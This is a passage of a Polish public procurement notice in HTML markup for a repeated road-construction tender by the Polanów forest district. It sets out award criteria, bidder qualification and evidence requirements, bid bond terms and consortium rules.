class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1.W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do występowania w obrocie gospodarczym.<br/>2)uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3)sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie spełniony jeśli Wykonawca wykaże, że posiada środki finansowe lub<br/>zdolność kredytową o wartości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>4) zdolności technicznej lub zawodowej<br/>4.1. Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie<br/>ostatnich 5 lat liczonych wstecz od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie) zrealizował co najmniej 2 roboty budowlane (przez robotę budowlaną rozumie się wykonanie robót<br/>na podstawie 1 umowy) polegające na budowie, przebudowie lub remoncie dróg lub placów o nawierzchni utwardzonej lub<br/>ulepszonej, na kwotę nie mniejszą niż: 150 000,00 zł brutto każda (słownie: sto pięćdziesiąt tysięcy złotych 00/100).<br/>4.2. Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony,<br/>jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować następującymi osobami:<br/>co najmniej 1 osobą na stanowisku kierownika budowy<br/>Niniejsza osoba winna posiadać uprawnienia* budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej<br/>drogowej bez ograniczeń.<br/>Ponadto osoba ta winna legitymować się minimum 2 – letnim doświadczeniem w kierowaniu robotami budowlanymi na<br/>stanowisku kierownika budowy lub kierownika robót drogowych przy robotach polegających na budowie, przebudowie lub<br/>rozbudowie drogi (licząc od daty uzyskaniu odpowiednich uprawnień budowlanych). Nakładające się na siebie okresy<br/>pełnienia ww. funkcji nie sumują się.<br/>*Uprawnienia wydane zgodnie z art. 12, art. 12a oraz art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z<br/>2021 r. poz. 2351 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego<br/>Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo<br/>budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r., poz. 1646).<br/>7.2.Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w<br/>oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9.<br/>7.3.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 7.1. powinni spełniać łącznie wszyscy<br/>Wykonawcy, z tym zastrzeżeniem, że warunek udziału w postępowaniu, o którym mowa w pkt 7.1 4) 4.1 SWZ (tj. wymagane<br/>w tym warunku dwie roboty budowlane) winien wykazać co najmniej jeden z tych wykonawców w całości.<br/>7.4.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w pkt. 7.1. ppkt 4) ppkt 4.1 SWZ,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni Wykonawcy.<br/>7.5.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji, których te zdolności są wymagane. W przypadku<br/>korzystania z zasobów podmiotu trzeciego warunek udziału w postępowaniu, o którym mowa w pkt 7.1 4) 4.1 SWZ (tj.<br/>wymagane w tym warunku dwie roboty budowlane) winien wykazać podmiot trzeci w całości.<br/>7.6.Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków<br/>udziału w postępowaniu, o których mowa w pkt 7.1. ppkt 3) i 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu<br/>podstawy wykluczenia, które zostały przewidziane w SWZ względem Wykonawcy.<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów<br/>udostępniających zasoby.<br/>7.7.Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP w<br/>zw. z art. 266 PZP może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności,<br/>jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Pełny<br/>zakres informacji określa pkt 9 SWZ:<br/>9.2 W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. Zamawiający przed udzieleniem<br/>zamów., działając na podst. art. 274 ust.1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych śr. dowodowych:<br/>a)wykazu robót budow. wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane, 5-letni okres liczony jest wstecz od dnia, w którym upływa termin składania ofert (wzór wykazu robot budow. stanowi<br/>zał.12 do SWZ)<br/>Jeżeli Wykonawca powołuje się na doświad. w realizacji robót budow., wykonanych wspólnie z innymi wykonawcami wykaz dotyczy<br/>robót budow. , w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b)Dowodów określających, czy wskazane przez Wykonawcę roboty budow. na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświad. zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budow.<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>c)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych śr. finansowych lub<br/>zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 m-ce przed jej złożeniem.<br/>d)wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami (wzór wykazu osób stanowi zał.13 do SWZ).<br/>9.4.Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać na zdolnościach technicznych<br/>lub zawodowych (warunki wskazane w pkt 7.1. ppkt 4 SWZ) lub sytuacji finansowej lub ekonomicznej (warunki wskazane w pkt 7.1<br/>ppkt 3 SWZ) innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>Wykonawca, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby, składa wraz z ofertą:<br/>1)zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Niewiążący wzór zobowiązania stanowi zał. nr 4 do SWZ.<br/>2)ośw. podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnienie warunków<br/>udziału w postępowaniu (w zakresie warunku, w stosunku do którego udostępnia swój potencjał) sporządzone zgodnie ze wzorami<br/>stanowiącymi zał. 7 i 6 do SWZ.<br/>Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1. ppkt 4 SWZ) lub sytuacji<br/>ekonomicznej lub finansowej (warunki wskazane w pkt 7.1 pkt 3 SWZ) na zasadach określonych w art.118 PZP w zw. z art. 266 PZP<br/>zobowiązany będzie do przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 9.3 lit. a), c)-f) SWZ,<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Pełny zakres informacji<br/>określa pkt 9 SWZ:<br/>9.3.W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1., 6.3. i 6.4. Zamawiający przed udzieleniem<br/>zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a)Informacji z KRKw zakresie:<br/>i)art. 108 ust 1 pkt. 1 i 2 PZP,<br/>j)art. 108 ust. 1 pkt. 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka karnego,<br/>- sporządzonej nie wcześniej niż 6 m-cy przed jej złożeniem,<br/>b )ośw. a Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym<br/>Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo ośw. o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub<br/>braku przynależności do tej grupy kapitałowej stanowi załącznik nr 5 do SWZ),<br/>c) zaśw. właściwego naczelnika US potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109<br/>ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 m-ce przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków<br/>lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania<br/>ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie<br/>w sprawie spłat tych należności,<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej ZUS lub właściwego oddziału regionalnego<br/>lub właściwej placówki terenowej KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w<br/>przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł<br/>wiążące porozumienie w sprawie spłat tych należności,<br/>e) odpisu lub informacji z KRS lub z CEIDG w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed<br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>f) ośw. wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw<br/>wykluczenia z postępowania określonych w:<br/>- art. 108 ust. 1 pkt 3 PZP,<br/>- art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 PZP,<br/>- art. 109 ust. 1 pkt 1 PZP, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w<br/>ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2022 r. poz. 1452 z późn. zm.),<br/>- art. 109 ust. 1 pkt 5, 7, 8 i 10 PZP,<br/>według wzoru stanowiącego zał. 10 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych.<br/>=========================================================<br/>c.d. podmiotowych śr. dowodowych - Pełny zakres informacji określa pkt. 9 SWZ<br/>9.5.Jeżeli Wykonawca lub podmiot udostępniający zasoby na zasadach określonych w art.118 w zw. z art. 266 PZP, ma<br/>siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast:<br/>1)inf. z KRK, o której mowa w pkt 9.3. lit. a) SWZ – składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy,<br/>albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub<br/>administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie, o którym mowa w pkt 9.3.<br/>lit. a) SWZ,<br/>2)zaśw., o którym mowa w pkt 9.3. lit. c) SWZ, zaświadczenia albo innego dokumentu potwierdzającego, że Wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o których mowa w pkt 9.3. lit. d) SWZ, lub odpisu<br/>albo informacji z KRS lub z CEIDG, o których mowa w pkt 9.3. lit. e) SWZ - składa dokument lub dokumenty wystawione w<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a)nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezp. społeczne lub zdrowotne,<br/>b)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>9.6.Dokument, o którym mowa w pkt 9.5 ppkt 1) SWZ, powinien być wystawiony nie wcześniej niż 6 m-cy przed jego<br/>złożeniem. Dokumenty, o których mowa w pkt 9.5. ppkt 2) SWZ powinny być wystawione nie wcześniej niż 3 m-ce przed ich<br/>złożeniem.<br/>9.7.Jeżeli w kraju, w którym wykonawca lub podmiot trzeci ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt. 9.5. lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa<br/>w art.108 ust.1 pkt 1, 2 i 4 lub art.109 ust.1 pkt 1 PZP, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświ. wykonawcy lub podmiotu trzeciego, ze wskazaniem osoby albo osób uprawnionych do<br/>jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed<br/>organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym<br/>ze względu na siedzibę lub miejsce zamieszk. wykonawcy lub podmiotu trzeciego.<br/>9.9.Jeżeli złożone przez wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1 PZP, lub podmiotowe środki dowodowe<br/>budzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub<br/>dokumentów istotnych w tym zakresie dla oceny spełniania przez wykonawcę warunków udziału w postępowaniu lub braku<br/>podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>9.10.W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2)oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.<br/>3)ośw., o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Ośw.<br/>te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełny zakres informacji określa SWZ opublikowana na stronie internetowej prowadzonego postępowania, tj. platforma<br/>zakupowej do obsługi komunikacji komunikacji w formie elektronicznej pomiędzy Zamawiającym a Wykonawcami oraz<br/>składania oferty: Portal e-Usługi SMARTPZP:https://portal.smartpzp.pl/nadlesnictwo.polanow <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Podana numeracja zgodna z SWZ:<br/>11.1.Zamawiający wymaga wniesienia wadium w wysokości: 5 000,00 zł (słownie: pięć tysięcy złotych 00/100)<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>11.2.Wadium może być wnoszone, według wyboru Wykonawcy, w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>11.3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Wadium wpłacane w pieniądzu<br/>należy wnieść przelewem na rachunek bankowy Zamawiającego w banku BGŻ Koszalin nr rachunku: 28 2030 0045 1110<br/>0000 0048 5280 lub w PKO BP I O/Koszalin nr rachunku 06 1020 2791 0000 7302 0013 6044 z dopiskiem: „Budowa PCW<br/>na terenie leś. Puławy – Nadleśnictwo Polanów” - postępowanie powtórzone. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji<br/>ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze<br/>pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty<br/>Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.4.Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP.<br/>11.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP.<br/>11.8.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w treści wadium wnoszonego w<br/>formach określonych w pkt 11.2 ppkt 2-4) powyżej, powinni zostać ujęci wszyscy członkowie konsorcjum albo powinno z<br/>niej jednoznacznie wynikać, że wykonawca, na którego gwarancja/poręczenie zostały wystawione działa w imieniu innych<br/>członków konsorcjum, bądź w ich treści powinien zostać ujęty szerszy zakres odpowiedzialności gwaranta/poręczyciela niż<br/>tylko dotyczący działań/zaniechań odnoszących się do wykonawcy, na którego gwarancja/poręczenie to zostało<br/>wystawione. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Podana numeracja zgodnie z SWZ<br/>9.10. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenia<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny zostać złożone wraz z ofertą pod rygorem<br/>nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia<br/>5) dokumenty, o których mowa w pkt 9.2. lit. a i d wykonawcy wspólnie ubiegający się o zamówienie składają wspólnie,<br/>natomiast dokumenty, o których mowa w pkt 9.2. lit. b i c składa ten z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, który wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci<br/>oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia został zawarty w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Pełny zakres informacji określa §15 umowy opublikowanej na stronie 